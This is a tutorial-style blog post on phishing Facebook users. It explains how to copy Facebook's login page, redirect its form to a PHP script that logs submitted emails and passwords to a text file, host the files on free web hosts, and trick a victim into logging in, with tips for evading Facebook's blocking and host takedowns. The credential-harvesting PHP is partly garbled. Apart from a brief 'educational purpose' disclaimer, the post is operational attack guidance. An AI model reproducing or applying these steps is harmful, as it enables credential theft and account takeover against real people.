Phishing Attack on Facebook

Phishing is the method to hack the victim by creating a Fake login page and Uploading it to a web hosting site so when Victim enters his E-mail Id and Password we get it.

How to Do Phishing

This Article is only for educational Purpose I won’t be Responsible for any Harm done by you.
The Process is divided into three parts -: First to create a Fake “Login Page”,than Uploading it on a Web Hosting Site and than Hacking the Victim.

Here are Steps for creating a “Fake Login page” :-

  • Open google chrome
  • Open Facebook
  • Now right click anywhere on the White part and than click on “View Page Source”.A webpage will open in New Tab, Press Ctrl+A and Copy(Ctrl + c)
  • Open Notepad and paste(Ctrl + V)
  • Now press Ctrl+F (Search) and search for “Action”, if you’re unable to find Action, keep on searching up and down.
  • Now we have to change something.you have searched action,in this line is written as-“https//www.facebook.com/login.php?login_attempt=1”,you have to change this and write ‘‘ankitpasskey.php’’and next to this something is written as ‘method=”post”’ change this and write ‘‘get’’ in place of ‘‘post’’ i.e. method=”get” so this is now action=”ankitpasskey.php” method=”get”
  • Now save it with name “login.html”

Now copy this and paste in notepad :-

$value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

Write the name of website in place of http://www.abcd./ com on which you are phishing,so you can write :-
$value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “ankit”);
}
fwrite($handle, “ankit”);
fclose($handle);
exit;
?>

Save it with name “ankitpasskey.php”

1.Open notepad again and save empty notepad file with name “ankitpass”.
2.Now we have 3 files- “login.html,ankitpasskey.php,ankitpass.txt”
3.Uploading These Files To any Free Webhosting Site

Here are some free Web Hosting Sites

  • 110mb
  • Ripway
  • SuperFreeHost
  • My3gb
  • Heliohost
  • freehostia
  • Freeweb7

Sign up on any of these Websites and Upload all the three Files such that “Login.html” is on top, “ankitpasskey.php” on middle and “ankitpass” on last.

Hacking The Victim

  • Go to your Web hosting account (Login), Right click on the Login File ie Login.html and than left click on Copy Link Address
  • Now you have to play a little game with victim, give him the link of that File(Login.html) and make him login to that file(once he click on the file he will be redirected to that fake login page), its depend on you how you do it.
  • Once the victim login with that fake page, visit your web hosting account again, open the file “ankitpass”, You will get both E-Mail ID and password of Victim…

Note :-1

  • Facebook have blocked most of the webhosting site, so, if possible try to give the link to victim outside FB ie via SMS or something like this
  • Do send the Link to victim before 24 hours because nowadays Web hosting sites delete Phishing account after 24 hrs.
  • Sometimes ankitpasskey.php, after uploading turns into ankitpasskey.php.txt if it happens change it to “ankitpasskey.php”